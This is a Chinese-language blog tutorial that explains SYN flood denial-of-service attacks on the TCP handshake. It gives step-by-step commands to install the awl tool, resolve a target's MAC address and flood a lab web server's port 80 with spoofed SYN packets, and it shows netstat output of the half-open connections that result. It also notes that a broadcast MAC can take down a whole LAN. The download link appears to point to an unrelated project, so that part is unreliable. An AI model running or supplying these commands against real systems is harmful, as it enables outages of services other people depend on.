利用tcp三次握手,使用awl僞裝MAC地址進行多線程SYN洪水×××

SYN洪水×××概述:
SYN洪水×××主要源於: tcp協議的三次握手機制
tcp協議面向鏈接的協議
SYN洪水×××的過程:
在服務端返回一個確認的SYN-ACK包的時候有個潛在的弊端,如果發起的客戶是一個不存在的客戶端,那麼服務端就不會接到客戶端迴應的ACK包
這時服務端需要耗費一定的數量的系統內存來等待這個未決的連接,直到等待超關閉時間,才能施放內存
如果惡意者通過通過ip欺騙,發送大量SYN包給受害者系統,導致服務端存在大量未決的連接並佔用大量內存和tcp連接,從而導致正常客戶端無法訪問服務端,這就是SYN洪水×××的過程

在客戶機上安裝awl軟件進行×××
下載地址:
https://gitlab.com/davical-project/awl/tags
上傳到linux系統中
開始安裝awl

[root@DaMoWang ~]# tar xf awl-0.2.tar.gz -C /usr/src/[root@DaMoWang ~]# cd /usr/src/awl-0.2/[root@DaMoWang awl-0.2]# ./configure && make -j 4 && make install[root@DaMoWang awl-0.2]# which awl/usr/local/bin/awl

awl僞裝MAC地址進行多線程SYN××× > 獲取對方的IP地址解析成MAC地址

[root@DaMoWang ~]# arp -n
Address                  HWtype  HWaddress           Flags Mask            Iface192.168.94.1             ether   00:50:56:c0:00:08   C                     ens33192.168.94.2             ether   00:50:56:f9:bc:19   C                     ens33
[root@DaMoWang ~]# ping 192.168.94.29[root@DaMoWang ~]# arp -n
Address                  HWtype  HWaddress           Flags Mask            Iface192.168.94.29            ether   00:0c:29:7d:b5:99   C                     ens33192.168.94.1             ether   00:50:56:c0:00:08   C                     ens33192.168.94.2             ether   00:50:56:f9:bc:19   C                     ens33

awl參數如下:
-i 發送包的接口
-m 指定目標mac地址 注:如果-m沒有指定mac,默認目標MAC地址是“FF.FF.FF.FF.FF.FF”,
這表示向同一網段內的所有主機發出ARP廣播,進行SYN×××,還容易使整個局域網癱瘓
-d 被×××機器的IP
-p 被×××機器的端口

# 查看被×××前的wab服務器80端口
[root@server ~]# netstat -antup|grep :80tcp6       0      0 :::80                   :::*                    LISTEN      1750/httpd

開始×××:

# 測試×××三秒
[root@DaMoWang ~]# awl -i ens33 -m 00:0c:29:7d:b5:99 -d 192.168.94.29 -p 80

 #×××效果:
 #在server上查看:發現很多僞裝成公網的IP在×××我們

[root@server ~]# netstat -antup|grep :80tcp        0      0 192.168.94.29:80        252.60.102.53:3310      SYN_RECV    -                   tcp        0      0 192.168.94.29:80        250.167.218.42:54569    SYN_RECV    -                   tcp        0      0 192.168.94.29:80        245.241.14.61:48316     SYN_RECV    -                   tcp        0      0 192.168.94.29:80        246.144.13.20:33828     SYN_RECV    -                   tcp        0      0 192.168.94.29:80        250.221.131.26:56896    SYN_RECV    -                   tcp        0      0 192.168.94.29:80        245.222.184.94:46875    SYN_RECV    -                   tcp        0      0 192.168.94.29:80        241.98.121.43:13190     SYN_RECV    -                   tcp        0      0 192.168.94.29:80        250.5.25.10:43506       SYN_RECV    -                   tcp        0      0 192.168.94.29:80        247.23.128.105:46118    SYN_RECV    -                   tcp        0      0 192.168.94.29:80        251.126.27.89:11781     SYN_RECV    -                   tcp        0      0 192.168.94.29:80        241.51.26.67:3393       SYN_RECV    -                   tcp        0      0 192.168.94.29:80        255.103.18.1:13774      SYN_RECV    -                   tcp        0      0 192.168.94.29:80        254.239.94.37:5561      SYN_RECV    -                   tcp        0      0 192.168.94.29:80        243.180.7.100:24802     SYN_RECV    -                   tcp        0      0 192.168.94.29:80        253.170.6.21:26871      SYN_RECV    -                   tcp        0      0 192.168.94.29:80        247.92.108.56:25729     SYN_RECV    -                   tcp        0      0 192.168.94.29:80        248.187.73.6:24181      SYN_RECV    -

  [root@server ~]# netstat -antup|grep :80 |wc -l
  121

 #三秒鐘 一百多次××× 

 


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章